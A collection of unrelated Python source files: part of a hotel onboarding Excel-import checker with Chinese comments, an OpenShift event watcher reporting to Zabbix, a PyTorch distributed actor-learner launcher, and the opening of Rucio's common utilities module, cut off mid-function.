else: # 这里是用来兼容基础设施的,基础设施的结构和其他的不一样
value = value_dict
# 格式化日期
if isinstance(value, datetime.datetime):
value = value.strftime("%Y-%m-%d")
row_data[key] = value
if len(row_data.keys()) > 0:
row_list.append(row_data)
return row_list
# 处理协议
def get_hotel_agreement(agreement):
not_null_list = ['totalTransCost', 'roomOyoTransCost', 'prepaymentRadio']
for not_null_key in not_null_list:
if not_null_key not in agreement or agreement.get(not_null_key) == '':
print('协议字段[%s]不能为空' % not_null_key)
for index, key in enumerate(agreement):
if agreement.get(key) == '非必填':
agreement[key] = ''
if key.endswith('Url') and agreement.get(key) == '':
agreement[key] = 'http://a'
urls = ['businessLicensePicUrl', 'frontIdCardPicUrl', 'bankCardUrl', 'partyAfrontIdCardPicUrl',
'reverseIdCardPicUrl']
for url in urls:
if url not in agreement:
agreement[url] = 'http://a'
# 协议类型
agreement['projectType'] = 'ISLANDS_2'
agreement['commissionDateTypeName'] = '控价日'
mdm_audit_time_key = 'mdmAuditTime'
if mdm_audit_time_key not in agreement or agreement[mdm_audit_time_key] is None:
# 当前时间+8小时,因为需要在submit时间之后
mdm_audit_time = datetime.datetime.now() + datetime.timedelta(hours=8)
agreement[mdm_audit_time_key] = mdm_audit_time.strftime('%Y-%m-%d %H:%M:%S')
prepayment_radio = agreement['prepaymentRadio']
if prepayment_radio < 1:
prepayment_radio = prepayment_radio * 100
agreement['prepaymentRadio'] = prepayment_radio
agreement['guaranteeIncomes'] = [{
"month": "1",
"money": agreement.pop('janAmg'),
"vmgMoney": agreement.pop('janVmg')
}, {
"month": "2",
"money": agreement.pop('febAmg'),
"vmgMoney": agreement.pop('febVmg')
}, {
"month": "3",
"money": agreement.pop('marchAmg'),
"vmgMoney": agreement.pop('marchVmg')
}, {
"month": "4",
"money": agreement.pop('aprilAmg'),
"vmgMoney": agreement.pop('aprilVmg')
}, {
"month": "5",
"money": agreement.pop('mayAmg'),
"vmgMoney": agreement.pop('mayVmg')
}, {
"month": "6",
"money": agreement.pop('juneAmg'),
"vmgMoney": agreement.pop('juneVmg')
}, {
"month": "7",
"money": agreement.pop('julyAmg'),
"vmgMoney": agreement.pop('julyVmg')
}, {
"month": "8",
"money": agreement.pop('augustAmg'),
"vmgMoney": agreement.pop('augustVmg')
}, {
"month": "9",
"money": agreement.pop('septAmg'),
"vmgMoney": agreement.pop('septVmg')
}, {
"month": "10",
"money": agreement.pop('octAmg'),
"vmgMoney": agreement.pop('octVmg')
}, {
"month": "11",
"money": agreement.pop('noveAmg'),
"vmgMoney": agreement.pop('noveVmg')
}, {
"month": "12",
"money": agreement.pop('deceAmg'),
"vmgMoney": agreement.pop('deceVmg')
}]
return agreement
# 二次处理房间信息
# 从sheet中读取到的是根据楼层分组的房间,这里把房间号和楼层进行交集处理
def get_rooms(floor_rooms, hotel_name):
ret_rooms = {}
room_num_check_list = []
room_sum = 0
print('<br>')
print(hotel_name)
print('<br>')
for index, room_type_floor in enumerate(floor_rooms):
room_nums = room_type_floor.get('roomNo')
row_index = index + 3
if room_nums is None:
continue
if isinstance(room_nums, int):
room_nums = str(room_nums)
room_nums = room_nums.replace('、', ',').replace(',', ',').replace('.', ',')
room_type_id = room_type_floor.get('roomTypeId')
if room_type_id is None:
print('<p style="color:red">' + hotel_name + ',第%s行,房型错误</p>' % row_index)
ret_room_type = ret_rooms.get(room_type_id, {
'roomTypeId': room_type_id,
'weekdayPrice': room_type_floor.get('weekdayPrice'),
'weekendPrice': room_type_floor.get('weekendPrice'),
'roomList': []
})
floor = room_type_floor.get('floor')
room_size = room_type_floor.get('size')
bed_count = room_type_floor.get('count')
bed_info_id = room_type_floor.get('bedInfoId')
print('房型: %s, 楼层: %s, 房间号: %s, 面积: %s, 床数: %s, 床型: %s'
% (room_type_id, floor, room_nums, room_size, bed_count, bed_info_id))
print('<br>')
if floor is None:
print('<p style="color:red">' + hotel_name + '第%s行楼层缺失</p>' % row_index)
if room_size is None:
print('<p style="color:red">' + hotel_name + '第%s行房间面积缺失</p>' % row_index)
if bed_count is None:
print('<p style="color:red">' + hotel_name + '第%s行床数缺失</p>' % row_index)
if bed_info_id is None:
print('<p style="color:red">' + hotel_name + '第%s行床型错误</p>' % row_index)
room_list = []
check = ',' not in room_nums
room_nums_arr = room_nums.split(',')
for room_i, room_no in enumerate(room_nums_arr):
if room_no is None or room_no == '':
continue
# 去掉前后空格
room_no = room_no.strip()
if room_no in room_num_check_list:
print('<p style="color:red">' + hotel_name + ',房间号%s已存在</p>' % room_no)
# 长度大于6位 且 并未包含分隔符
if len(room_no) >= 6 and check:
print('<p style="color:red">' + hotel_name + ',房间号%s格式不对</p>' % room_no)
room_num_check_list.append(room_no)
room_list.append({
'floor': floor,
'roomNo': room_no,
'size': room_size,
'status': 1,
'bedInfoList': [{
'count': bed_count,
'bedInfoId': bed_info_id
}]
})
if len(room_list) > 0:
ret_room_type.get('roomList').extend(room_list)
# ret_rooms[room_type_id] = ret_room_type
room_sum = room_sum + len(ret_room_type.get('roomList'))
return room_sum
excel_sheets = {
'酒店': 0,
'酒店(勿动)': 0,
'酒店(勿动)': 0,
'联系人': 1,
'联系人(勿动)': 1,
'联系人(勿动)': 1,
'OTA账号': 2,
'OTA账号(勿动)': 2,
'OTA账号(勿动)': 2,
'企业法人': 3,
'企业法人(勿动)': 3,
'企业法人(勿动)': 3,
'房间': 4,
'房型房间信息(编辑区)': 4,
'房型房间信息(编辑区)': 4,
'房型房间信息(填写区)': 4,
'酒店设施': 5,
'酒店设施(勿动)': 5,
'酒店设施(勿动)': 5
# '协议信息': 6,
# '协议信息(勿动)': 6
}
# 读excel
def read_xlsx(file_path, file_name):
ret_json_hotel = {
"type": "qianyu",
"operator": "qy_import"
}
wb = openpyxl.load_workbook(file_path, data_only=True)
for name, index in excel_sheets.items():
if name in wb.sheetnames:
sheet_index = excel_sheets.get(name)
sheet_data = get_sheet_data(wb.get_sheet_by_name(name), sheet_index)
if len(sheet_data) == 0:
continue
# 1.酒店信息
if sheet_index == 0:
hotel_info = sheet_data[0] # 读取酒店信息
if str(hotel_info['stateId']) is '#REF!':
print('<p style="color:red">' + file_name + ',酒店 省 填写错误</p>')
if str(hotel_info['cityId']) is '#REF!':
print('<p style="color:red">' + file_name + ',酒店 市 填写错误</p>')
if str(hotel_info['clusterId']) is '#REF!':
print('<p style="color:red">' + file_name + ',酒店 区 填写错误</p>')
if str(hotel_info['streetId']) is '#REF!':
print('<p style="color:red">' + file_name + ',酒店 街道 填写错误</p>')
sign_room_num = hotel_info.get('signRoomNum')
# 2.联系人
if sheet_index == 1:
contacts = []
for index, contact in enumerate(sheet_data):
email = contact.get('email')
if email == '' or email == '0' or email == 0:
contact.pop('email')
if contact.get('name') is not None:
contacts.append(contact)
# 3.OTA账号
if sheet_index == 2:
for index, ota_account in enumerate(sheet_data):
if ota_account.get('name') is '#N/A' or ota_account.get('password') is '#N/A' or ota_account.get(
'name') is '#N/A' or ota_account.get('password') is '#N/A':
print('<p style="color:red">' + file_name + ',OTA账号存在脏数据</p>')
# 4.企业法人和银行信息
if sheet_index == 3:
legal_bank_info = sheet_data[0]
# ret_json_hotel['legalEntities'] = [{
# 'name': legal_bank_info.get('name'),
# 'type': legal_bank_info.get('type'),
# 'termOfOperation': legal_bank_info.get('termOfOperation'),
# 'licenseNo': legal_bank_info.get('licenseNo'),
# 'certificateType': legal_bank_info.get('certificateType'),
# 'certificateNo': legal_bank_info.get('certificateNo')
# }]
if legal_bank_info.get('type') is None:
print('<p style="color:red">' + file_name + ',企业类型有误</p>')
if legal_bank_info.get('accountType') is None:
print('<p style="color:red">' + file_name + ',账号类型有误</p>')
# bank_interbank_number = legal_bank_info.get('bankInterbankNumber')
# if bank_interbank_number == '' or bank_interbank_number is None:
# bank_interbank_number = 'a'
#
# bank_ddress = legal_bank_info.get('bankAddress')
# if bank_ddress == '' or bank_ddress is None:
# bank_ddress = 'a'
#
# ret_json_hotel['bankAccountInfos'] = [{
# 'receivingParty': legal_bank_info.get('receivingParty'),
# 'contactTelephone': legal_bank_info.get('contactTelephone'),
# 'accountType': legal_bank_info.get('accountType'),
# 'bankAccount': legal_bank_info.get('bankAccount'),
# 'openingBank': legal_bank_info.get('openingBank'),
# 'branchOpeningBank': legal_bank_info.get('branchOpeningBank'),
# 'bankInterbankNumber': bank_interbank_number,
# 'bankAddress': bank_ddress
# }]
# 5.房间
if sheet_index == 4:
# ret_json_hotel['room'] = get_rooms(sheet_data)
real_room_num = get_rooms(sheet_data, file_name)
if sign_room_num - real_room_num:
print('请检查房间数量,签约房间数为:%s,当前房间数为:%s' % (sign_room_num, real_room_num))
# 6.酒店设施
if sheet_index == 5:
amenity_list = []
if sheet_data is not None and len(sheet_data) > 0:
for key, amenity_id in sheet_data[0].items():
if isinstance(amenity_id, int):
amenity_list.append(amenity_id)
ret_json_hotel['amenityList'] = amenity_list
return ret_json_hotel
# 递归目录 考虑多线程操作 减少耗时
def list_dir(path):
now = datetime.datetime.now() # 开始计时
print('开始时间:' + now.strftime("%Y-%m-%d %H:%M:%S"))
print('<br>')
file_names = os.listdir(path)
file_names.sort()
# 线程组
# thread = []
# 进程组
# process = []
process = Pool(20)
# res_data = []
for i in range(len(file_names)):
if not file_names[i].startswith('~$') and file_names[i].endswith('.xlsx'):
# print('<br>')
# print('<p>%s: %s</p>' % (i, file_names[i]))
# print('<br>')
file_name = path + "/" + file_names[i] # 要获取的excel地址
# t = threading.Thread(target=read_xlsx, args=(file_name,))
# thread.append(t)
# p = Process(target=read_xlsx, args=(file_name,))
# process.append(p)
process.apply_async(read_xlsx, (file_name, file_names[i]))
# res_data.append(res_d)
# 多线程模式 不适用 GIL的存在,使得Python在同一时间只能运行一个线程,所以只占用了一个CPU
# thread_num = len(thread)
# print(thread_num)
# for i in range(len(thread)):
# thread[i].start()
#
# for i in range(len(thread)):
# thread[i].join()
# 多进程模式 如果进程都需要写入同一个文件,那么就会出现多个进程争用资源
# process_num = len(process)
# for i in range(process_num):
# process[i].start()
#
# for i in range(process_num):
# process[i].join()
process.close()
process.join()
end = datetime.datetime.now() # 结束计时
print('<br>')
print('结束时间:' + end.strftime("%Y-%m-%d %H:%M:%S"))
print('<br>')
print('程序耗时: ' + str(end - now))
list_dir(dir)
|
cron-event-watcher.py
|
#!/usr/bin/env python
# vim: expandtab:tabstop=4:shiftwidth=4
'''
Process OpenShift event stream
'''
#
# Copyright 2016 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#This is not a module, but pylint thinks it is. This is a command.
#pylint: disable=invalid-name
# pylint flaggs import errors, as the bot doesn't know out openshift-tools libs
#pylint: disable=import-error
import argparse
from Queue import Queue
import re
import subprocess
import threading
import time
import yaml
from openshift_tools.monitoring.metric_sender import MetricSender
#pylint: disable=too-few-public-methods
class OpenshiftEventConsumer(object):
''' Submits events to Zabbix '''
def __init__(self, args, queue, zbx_keys):
self.queue = queue
self.args = args
self.zbx_keys = zbx_keys
def run(self):
''' main function '''
while True:
event_list = []
while not self.queue.empty():
event = self.queue.get()
if self.args.debug:
print "Processing event: {}".format(str(event))
event_list.append(event)
# initialize event counts so that we send '0' events
# in the case where no events were received
event_counts = {}
for zbx_key in self.zbx_keys:
event_counts[zbx_key] = 0
# add up each distinct event
for event in event_list:
event_counts[event] += 1
if self.args.verbose or self.args.dry_run:
print "Got events: " + str(event_counts)
if not self.args.dry_run:
metric_sender = MetricSender(verbose=self.args.verbose, debug=self.args.debug)
for event, count in event_counts.iteritems():
metric_sender.add_metric({event: count})
metric_sender.send_metrics()
time.sleep(self.args.reporting_period)
# Never should get here
class OpenshiftEventWatcher(object):
''' Watches OpenShift event stream '''
def __init__(self, queue):
self.args = None
self.queue = queue
self.parse_args()
def run(self):
''' Main function '''
self.event_watch_loop()
def watch_list_setup(self):
''' create dict of events/reasons to watch for
plus a regex to further filter events'''
with open(self.args.config, 'r') as config:
self.args.watch_for = yaml.load(config)['event_watcher_config']
def parse_args(self):
''' parse the args from the cli '''
parser = argparse.ArgumentParser(description='OpenShift event watcher')
parser.add_argument('--kubeconfig', default='/etc/origin/master/admin.kubeconfig',
help='Location of OpenShift kubeconfig file')
parser.add_argument('--config', default='/container_setup/monitoring-config.yml',
help='Config file for event watcher script')
parser.add_argument('-v', '--verbose', action='store_true',
default=None, help='Verbose?')
parser.add_argument('--debug', action='store_true',
default=None, help='Debug?')
parser.add_argument('--dry-run', action='store_true', default=False,
help='Do not send results to Zabbix')
parser.add_argument('--reporting-period', default=60, type=int,
help='How many seconds between each reporting period')
self.args = parser.parse_args()
self.watch_list_setup()
def check_event(self, event):
''' If an event is something we're looking for
return the key it should be reported as '''
# Most events aren't something we will care about
# so catch that case and return early
foundReason = ''
for reasonCandidate in event['reasonFields']:
if reasonCandidate in self.args.watch_for.keys():
foundReason = reasonCandidate
if not foundReason:
return None
regex_list = self.args.watch_for[foundReason]
for regex in regex_list:
if re.search(regex['pattern'], event['message']):
return regex['zbx_key']
# If we made it here, then there was no regex match
# so the event is not something we will report to zabbix
return None
def get_zbx_keys(self):
''' return list of zbx keys config file says to report on '''
zbx_keys = []
for _, regex_list in self.args.watch_for.iteritems():
for regex in regex_list:
zbx_keys.append(regex['zbx_key'])
return zbx_keys
def event_watch_loop(self):
''' Loop to read/process OpenShift events '''
while True:
# k8s v1.11 has a bug preventing output of watches in non-default
# format types, so we can't use -o here.
popen = subprocess.Popen(['oc', 'get', 'events', '--all-namespaces',
'--config', self.args.kubeconfig,
'--watch-only'], bufsize=1,
stdout=subprocess.PIPE)
print "Watching for events: " + str(self.args.watch_for)
for line in iter(popen.stdout.readline, b''):
# The 'Reason' field should be the fourth element in
# the line, and the previous three elements do not contain
# values that allow whitespace - a split will suffice.
fields = line.split()
# We need to do a little checking to know where to
# find the 'message' column
if len(fields) > 8:
event = {
'reasonFields': fields[7:9],
'message': ' '.join(fields[8:])
}
if self.args.debug:
print "Event type candidates: " + ' '.join(event['reasonFields'])
print line
result = self.check_event(event)
if result:
if self.args.verbose:
print "Matched event: " + ' '.join(event['reasonFields']) + \
" " + event['message']
self.queue.put(result)
# Never should get here - but if it does, add a cool-off timer for a minute
# to avoid smashing repeated 'oc get events' calls.
time.sleep(self.args.reporting_period)
if __name__ == '__main__':
event_queue = Queue()
OEW = OpenshiftEventWatcher(event_queue)
zbx_key_list = OEW.get_zbx_keys()
watch_thread = threading.Thread(target=OEW.run)
watch_thread.start()
OEC = OpenshiftEventConsumer(OEW.args, event_queue, zbx_key_list)
event_consumer = threading.Thread(target=OEC.run)
event_consumer.start()
|
run.py
|
import torch.multiprocessing as mp
mp.set_start_method('spawn', force=True)
def run_actor(Actor, **kwargs):
actor = Actor(**kwargs)
actor.run()
def run_learner(Learner, **kwargs):
learner = Learner(**kwargs)
learner.run()
def run_distributed(create_env_fn, log_dir, Actor, Learner, num_actors,
configs):
mp.freeze_support()
shared_kwargs = {
'shared_memory': mp.Queue(100),
'shared_weights': mp.Manager().dict()
}
learner_kwargs = dict(
env=create_env_fn(),
log_dir=log_dir,
Learner=Learner,
**configs['common'],
**configs['learner'],
**shared_kwargs,
)
processes = [mp.Process(target=run_learner, kwargs=learner_kwargs)]
for actor_id in range(num_actors):
actor_kwargs = dict(
env=create_env_fn(),
log_dir=log_dir,
Actor=Actor,
actor_id=actor_id,
num_actors=num_actors,
**configs['common'],
**configs['actor'],
**shared_kwargs,
)
processes.append(
mp.Process(target=run_actor, kwargs=actor_kwargs))
for pi in range(len(processes)):
processes[pi].start()
for p in processes:
p.join()
|
utils.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2022 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2021
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2022
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2022
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019-2021
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - root <root@escape-rucio-dev-oidc-r.cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Mayank Sharma <mayank.sharma@cern.ch>, 2021
# - Rahul Chauhan <omrahulchauhan@gmail.com>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021-2022
# - Anil Panta <47672624+panta-123@users.noreply.github.com>, 2021
# - Ilija Vukotic <ivukotic@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - martynia <janusz.martyniak@googlemail.com>, 2021-2022
# - jdierkes <joel.dierkes@cern.ch>, 2021
# - Rakshita Varadarajan <rakshitajps@gmail.com>, 2021
# - Rob Barnsley <robbarnsley@users.noreply.github.com>, 2021
# - Igor Mandrichenko <ivm@fnal.gov>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import absolute_import, print_function
import argparse
import base64
import datetime
import errno
import getpass
import hashlib
import io
import itertools
import json
import logging
import mmap
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from collections import OrderedDict
from enum import Enum
from functools import partial
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, binary_type, ensure_text, PY3
from six.moves import StringIO, zip_longest as izip_longest
from six.moves.urllib.parse import urlparse, urlencode, quote, parse_qsl, urlunparse
from six.moves.configparser import NoOptionError, NoSectionError
from rucio.common.config import config_get, config_has_section
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException, \
DuplicateCriteriaInDIDFilter, DIDFilterSyntaxError, InvalidAlgorithmName
from rucio.common.extra import import_extras
from rucio.common.types import InternalAccount, InternalScope
EXTRA_MODULES = import_extras(['paramiko'])
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
# Server Error.
500: '500 Internal Server Error',
501: '501 Not Implemented',
502: '502 Bad Gateway',
503: '503 Service Unavailable',
504: '504 Gateway Timeout'
}
# RFC 1123 (ex RFC 822)
DATE_FORMAT = '%a, %d %b %Y %H:%M:%S UTC'
def dids_as_dicts(did_list):
"""
Converts list of DIDs to list of dictionaries
:param did_list: list of DIDs as either "scope:name" or {"scope":"scope", "name","name"}
:returns: list of dictionaries {"scope":"scope", "name","name"}
"""
out = []
for did in did_list:
if isinstance(did, str):
scope, name = did.split(":", 1)
did = dict(scope=scope, name=name)
if isinstance(did, dict):
if not ("name" in did and "scope" in did):
raise ValueError("Scope or name missing in: %s" % (did,))
else:
raise ValueError("Can not convert item %s (%s) to a DID" % (did, type(did)))
out.append(did)
return out
def build_url(url, path=None, params=None, doseq=False):
"""
utitily function to build an url for requests to the rucio system.
If the optional parameter doseq is evaluates to True, individual key=value pairs
separated by '&' are generated for each element of the value sequence for the key.
"""
complete_url = url
if path is not None:
complete_url += "/" + path
if params is not None:
complete_url += "?"
if isinstance(params, str):
complete_url += quote(params)
else:
complete_url += urlencode(params, doseq=doseq)
return complete_url
def all_oidc_req_claims_present(scope, audience, required_scope, required_audience, sepatator=" "):
"""
Checks if both of the following statements are true:
- all items in required_scope are present in scope string
- all items in required_audience are present in audience
returns false otherwise. audience and scope must be both strings
or both lists. Similarly for required_* variables.
If this condition is satisfied, False is returned.
:params scope: list of strings or one string where items are separated by a separator input variable
:params audience: list of strings or one string where items are separated by a separator input variable
:params required_scope: list of strings or one string where items are separated by a separator input variable
:params required_audience: list of strings or one string where items are separated by a separator input variable
:params sepatator: separator string, space by default
:returns : True or False
"""
if not scope:
scope = ""
if not audience:
audience = ""
if not required_scope:
required_scope = ""
if not required_audience:
required_audience = ""
if (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope for elem in required_scope)
req_audience_present = all(elem in audience for elem in required_audience)
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = str(scope)
audience = str(audience)
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, list) and isinstance(audience, list) and isinstance(required_scope, string_types) and isinstance(required_audience, string_types)):
scope = [str(it) for it in scope]
audience = [str(it) for it in audience]
required_scope = str(required_scope)
required_audience = str(required_audience)
req_scope_present = all(elem in scope for elem in required_scope.split(sepatator))
req_audience_present = all(elem in audience for elem in required_audience.split(sepatator))
return req_scope_present and req_audience_present
elif (isinstance(scope, string_types) and isinstance(audience, string_types) and isinstance(required_scope, list) and isinstance(required_audience, list)):
scope = str(scope)
audience = str(audience)
required_scope = [str(it) for it in required_scope]
required_audience = [str(it) for it in required_audience]
req_scope_present = all(elem in scope.split(sepatator) for elem in required_scope)
req_audience_present = all(elem in audience.split(sepatator) for elem in required_audience)
return req_scope_present and req_audience_present
else:
return False
def generate_uuid():
return str(uuid()).replace('-', '').lower()
def generate_uuid_bytes():
return uuid().bytes
# GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5', 'sha256', 'crc32']
GLOBALLY_SUPPORTED_CHECKSUMS = ['adler32', 'md5']
CHECKSUM_ALGO_DICT = {}
PREFERRED_CHECKSUM = GLOBALLY_SUPPORTED_CHECKSUMS[0]
CHECKSUM_KEY = 'supported_checksums'
def is_checksum_valid(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
return checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS
def set_preferred_checksum(checksum_name):
"""
A simple function to check wether a checksum algorithm is supported.
Relies on GLOBALLY_SUPPORTED_CHECKSUMS to allow for expandability.
:param checksum_name: The name of the checksum to be verified.
:returns: True if checksum_name is in GLOBALLY_SUPPORTED_CHECKSUMS list, False otherwise.
"""
if is_checksum_valid(checksum_name):
global PREFERRED_CHECKSUM
PREFERRED_CHECKSUM = checksum_name
def set_checksum_value(file, checksum_names_list):
for checksum_name in checksum_names_list:
if checksum_name in file['metadata'].keys() and file['metadata'][checksum_name]:
file['checksum'] = '%s:%s' % (checksum_name.upper(), str(file['metadata'][checksum_name]))
if checksum_name == PREFERRED_CHECKSUM:
break
def adler32(file):
"""
An Adler-32 checksum is obtained by calculating two 16-bit checksums A and B
and concatenating their bits into a 32-bit integer. A is the sum of all bytes in the
stream plus one, and B is the sum of the individual values of A from each step.
:param file: file name
:returns: Hexified string, padded to 8 values.
"""
# adler starting value is _not_ 0
adler = 1
can_mmap = False
try:
with open(file, 'r+b') as f:
can_mmap = True
except:
pass
try:
# use mmap if possible
if can_mmap:
with open(file, 'r+b') as f:
m = mmap.mmap(f.fileno(), 0)
# partial block reads at slightly increased buffer sizes
for block in iter(partial(m.read, io.DEFAULT_BUFFER_SIZE * 8), b''):
adler = zlib.adler32(block, adler)
else:
with open(file, 'rb') as f:
# partial block reads at slightly increased buffer sizes
for block in iter(partial(f.read, io.DEFAULT_BUFFER_SIZE * 8), b''):
adler = zlib.adler32(block, adler)
except Exception as e:
raise Exception('FATAL - could not get Adler-32 checksum of file %s: %s' % (file, e))
# backflip on 32bit -- can be removed once everything is fully migrated to 64bit
if adler < 0:
adler = adler + 2 ** 32
return str('%08x' % adler)
CHECKSUM_ALGO_DICT['adler32'] = adler32
def md5(file):
"""
Runs the MD5 algorithm (RFC-1321) on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
hash_md5 = hashlib.md5()
try:
with open(file, "rb") as f:
list(map(hash_md5.update, iter(lambda: f.read(4096), b"")))
except Exception as e:
raise Exception('FATAL - could not get MD5 checksum of file %s - %s' % (file, e))
return hash_md5.hexdigest()
CHECKSUM_ALGO_DICT['md5'] = md5
def sha256(file):
"""
Runs the SHA256 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
with open(file, "rb") as f:
bytes_ = f.read() # read entire file as bytes
readable_hash = hashlib.sha256(bytes_).hexdigest()
print(readable_hash)
return readable_hash
CHECKSUM_ALGO_DICT['sha256'] = sha256
def crc32(file):
"""
Runs the CRC32 algorithm on the binary content of the file named file and returns the hexadecimal digest
:param file: file name
:returns: string of 32 hexadecimal digits
"""
prev = 0
for eachLine in open(file, "rb"):
prev = zlib.crc32(eachLine, prev)
return "%X" % (prev & 0xFFFFFFFF)
CHECKSUM_ALGO_DICT['crc32'] = crc32
def str_to_date(string):
""" Converts a RFC-1123 string to the corresponding datetime value.
:param string: the RFC-1123 string to convert to datetime value.
"""
return datetime.datetime.strptime(string, DATE_FORMAT) if string else None
def val_to_space_sep_str(vallist):
""" Converts a list of values into a string of space separated values
:param vallist: the list of values to to convert into string
:return: the string of space separated values or the value initially passed as parameter
"""
try:
if isinstance(vallist, list):
return text_type(" ".join(vallist))
else:
return text_type(vallist)
except:
return text_type('')
def date_to_str(date):
""" Converts a datetime value to the corresponding RFC-1123 string.
:param date: the datetime value to convert.
"""
return datetime.datetime.strftime(date, DATE_FORMAT) if date else None
class APIEncoder(json.JSONEncoder):
""" Propretary JSONEconder subclass used by the json render function.
This is needed to address the encoding of special values.
"""
def default(self, obj): # pylint: disable=E0202
if isinstance(obj, datetime.datetime):
# convert any datetime to RFC 1123 format
return date_to_str(obj)
elif isinstance(obj, (datetime.time, datetime.date)):
# should not happen since the only supported date-like format
# supported at dmain schema level is 'datetime' .
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return obj.days * 24 * 60 * 60 + obj.seconds
elif isinstance(obj, Enum):
return obj.name
elif isinstance(obj, (InternalAccount, InternalScope)):
return obj.external
return json.JSONEncoder.default(self, obj)
def render_json(**data):
""" JSON render function
"""
return json.dumps(data, cls=APIEncoder)
def render_json_list(list_):
""" JSON render function for list
"""
return json.dumps(list_, cls=APIEncoder)
def datetime_parser(dct):
""" datetime parser
"""
for k, v in list(dct.items()):
if isinstance(v, string_types) and re.search(" UTC", v):
try:
dct[k] = datetime.datetime.strptime(v, DATE_FORMAT)
except Exception:
pass
return dct
def parse_response(data):
"""
JSON render function
"""
if hasattr(data, 'decode'):
data = data.decode('utf-8')
return json.loads(data, object_hook=datetime_parser)
def execute(cmd, blocking=True):
"""
Executes a command in a subprocess. Returns a tuple
of (exitcode, out, err), where out is the string output
from stdout and err is the string output from stderr when
executing the command.
:param cmd: Command string to execute
"""
process = subprocess.Popen(cmd,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if blocking:
result = process.communicate()
(out, err) = result
exitcode = process.returncode
return exitcode, out.decode(encoding='utf-8'), err.decode(encoding='utf-8')
return process
def rse_supported_protocol_operations():
""" Returns a list with operations supported by all RSE protocols."""
return ['read', 'write', 'delete', 'third_party_copy']
def rse_supported_protocol_domains():
""" Returns a list with all supoorted RSE protocol domains."""
return ['lan', 'wan']
def grouper(iterable, n, fillvalue=None):
""" Collect data into fixed-length chunks or blocks """
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(*args, fillvalue=fillvalue)
def chunks(iterable, n):
"""
Yield successive n-sized chunks from l.
"""
if isinstance(iterable, list):
for i in range(0, len(iterable), n):
yield iterable[i:i + n]
else:
it = iter(iterable)
while True:
chunk = list(itertools.islice(it, n))
if not chunk:
return
yield chunk
def dict_chunks(dict_, n):
"""
Iterate over the dictionary in groups of the requested size
"""
it = iter(dict_)
for _ in range(0, len(dict_), n):
